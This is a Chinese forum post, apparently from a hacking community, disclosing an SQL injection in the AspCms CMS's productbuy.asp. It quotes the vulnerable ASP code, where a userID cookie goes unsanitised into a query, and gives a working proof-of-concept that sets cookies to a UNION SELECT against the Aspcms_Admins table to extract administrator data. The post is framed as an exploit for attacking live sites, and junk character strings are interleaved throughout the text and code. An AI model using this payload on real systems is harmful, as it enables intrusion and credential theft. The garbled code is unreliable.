好久没上土司了,上来一看发现在删号名单内.....4 e/ `5 @( W5 k% V9 F
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
" }$ z& f o7 @; W废话不多说,看代码:
' b4 N: P5 I6 s4 {& R) G8 A9 A: |' m; `
<%
2 y. Y( \/ E! w1 W2 g( P
! ]+ y1 k6 B& v U, v5 ^" V' mif action = "buy" then# {! {0 Y! N+ Z' z& `$ H
6 l- P6 I V! h6 ` O/ m- }( _ addOrder()
1 u- d" X Q* n c
0 f( N% K. ?* X4 {# i2 Selse
( V7 S3 }; U, ^6 v( l/ g' f4 O0 k! _3 Q
echoContent()
9 n8 t+ \) R1 {: g5 u- C k0 w
* F8 x& D/ E! p( W& n9 r* Dend if' T6 \1 r* \$ o5 X4 G e
K" m" C6 M8 [ X! J* ~
" g+ V& y& k+ P. ?
( ?1 I4 ~* I- l. C4 } F# k……略过
4 i4 x9 z; a. J5 ` _! W% M* b9 e# ^- ^/ a# R7 }9 l
) M; g2 w `3 I, H! B4 Y- G
# o0 ^: L# s9 \) vSub echoContent()' M% D5 S$ { G! L3 \! S
% L9 Q F/ Z6 K5 ?6 R dim id% o* H$ I m! Q* d( M; Y" P/ M
" H. N3 w: \ q1 |1 t) h: k( G
id=getForm("id","get")
( ~5 }4 ]8 }+ Y& _) Y. P2 C- T) J; \! r; h- B" I- O, m8 ^9 z
- s! [( V/ `; Z# _) [) t0 Z, X. b
! H& E4 T% x; b: R5 b
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
5 W2 _8 v" N: [# P1 i; ]& X3 t5 I/ A( H4 [" F
, h% f! t; O% D. D% m; W
& s4 j8 P# u! q, u% i4 c dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")+ s: z! w j/ p" ^; A
+ J: o9 K# h$ G8 B" \5 [7 K dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct$ W1 d( v: B2 P; X( ]
( O( x* k h6 I6 ]. A
Dim templatePath,tempStr! E" c( L. H f7 l* U$ u
+ R* g6 T2 ~8 W) a9 r templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
2 ?$ J- Z* W9 g/ q! Q
0 L- p: A, M, M: x. O8 F+ d
) `9 Q) Z% O# ~
- l8 d( G& N8 w/ q5 v8 t# `9 u" T set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
! I. n7 C: F( a0 G" f! G& f4 \: @1 h. C& z/ F
selectproduct=rsObj(0)
' R' p. Z( I; q8 q/ N' g
2 G* O% T! d$ _: G" h+ N 3 m0 j* _- |- a3 w; y) l' F
) w" G4 l* v) W' \) ?9 q+ U6 i2 I
Dim linkman,gender,phone,mobile,email,qq,address,postcode7 h1 ^8 s& ]& x) L
3 r8 \5 Z& s) S) b if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
. d& ~' R8 i9 _; z* }2 [& |% |/ b. {* U
if rCookie("loginstatus")=1 then 9 |3 A# E: E4 _" ]; P( _1 j
- v2 D( g) Q/ x7 {. H set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")% I1 B" }, N" [+ P4 Y5 p
- d2 Q$ M, w# O/ U! Y) a; g/ z linkman=rsObj("truename")
% M. { m. b; S7 _9 E3 A7 X, J. K v* Q; F; X' i4 Z4 B7 b
gender=rsObj("gender")0 B4 s) J& A& f6 `
( _ T1 O+ A. p5 H" Y- Q; Q- t phone=rsObj("phone")8 z& U3 _8 C+ O$ F' P) a' o9 X
! h: L( x$ u- V6 {) f mobile=rsObj("mobile")
$ r) f% y# Y7 J! ^3 @0 B# p6 K* ~$ D2 t& {9 i
email=rsObj("email")/ K+ r3 m: s% l) f; q
4 I" \" C: C7 j/ W& R
qq=rsObj("qq")
% M @( r1 { A8 r. [0 R
# {2 M( Z* h2 H) U address=rsObj("address")! Y$ ^; D6 d' s1 D/ t
' u4 h+ U# G2 {
postcode=rsObj("postcode")
2 G- O3 ?0 i1 }. Q# e
7 a3 ^ g5 G6 T" P else
( t2 O$ F% C2 w) F8 J
$ z [) {& d4 s gender=1' P) }/ j# |- P: L5 |8 y/ d
4 K) E6 V1 Q7 J
end if
4 J1 M) i+ i5 ~
1 t5 D/ C7 V1 E! x+ o- | rsObj.close()% o! Y% z1 h- _' i
/ }; n: K- `$ U+ b # W8 ^9 f; M( o
* B* o* k! S6 Y6 x with templateObj & m$ s) Z4 {' z. x
( n: L) Q- s6 ?% A* J! z. D; r
.content=loadFile(templatePath)
- s j: ]/ g# x2 t- {
4 y+ ]1 o6 x! q9 L4 ~5 {$ g .parseHtml()
- m* Q/ W3 ?: H c% C6 e
- G6 L3 k* H) L3 } o .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct) Q/ z4 E# s1 X+ r7 j% P! h+ ?
# t9 e' b+ w% o. s0 A0 K& s
.content=replaceStr(.content,"[aspcms:linkman]",linkman)
( q$ }& W' _+ `/ m' u% {! H% e& M/ G, n
.content=replaceStr(.content,"[aspcms:gender]",gender)
" ^' @+ O, I$ O4 P8 V; u8 k) a' a$ |" Z( ~/ {9 Z
.content=replaceStr(.content,"[aspcms:phone]",phone) " T N) X8 A% @1 C3 O1 ?
- G+ N' G& t1 [ .content=replaceStr(.content,"[aspcms:mobile]",mobile) 4 g. [, q7 X& a; E' \
7 r4 H1 L. S; t2 p
.content=replaceStr(.content,"[aspcms:email]",email) & f1 L+ B, g! A2 y9 r& k- U) ?
9 D' [) }% ^7 j8 [! q D: T- f, |
.content=replaceStr(.content,"[aspcms:qq]",qq)
/ } V: G: O' r8 P
; K' E; g; S8 h! ]5 {8 Y4 K$ M .content=replaceStr(.content,"[aspcms:address]",address) / y9 p; S# K: V
6 A) `+ @. B; v+ q2 [ .content=replaceStr(.content,"[aspcms:postcode]",postcode)
7 M1 t8 e/ L: ]$ ]2 s. J' x/ O+ F [+ W% r# E8 {
.parseCommon() & k: `' f5 { ?% P b
7 R4 {4 V3 X4 z echo .content * u7 K4 h1 w- T/ g. h% a
; g9 H- ^) f) s N2 K+ T
end with- y6 |. l: K1 G# r: n+ P' t
3 V8 n% ~, t; d7 N set templateobj =nothing : terminateAllObjects
7 q8 b' C) R: | D3 p4 V1 K' W4 r2 q# ~+ W, X' f
End Sub
( {: E1 e4 }) Y ]0 t, u. g; @+ R9 ]漏洞很明显,没啥好说的& W! k) ?: N7 O* `8 e. q
poc:2 `( T7 A- G4 e
6 _4 `: I5 P; Y5 ], y+ c, @- _, _
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子( b5 Y, H( o& h( ?% u6 U
, U/ I; @2 g* ~3 s1 P1 P5 y2 r |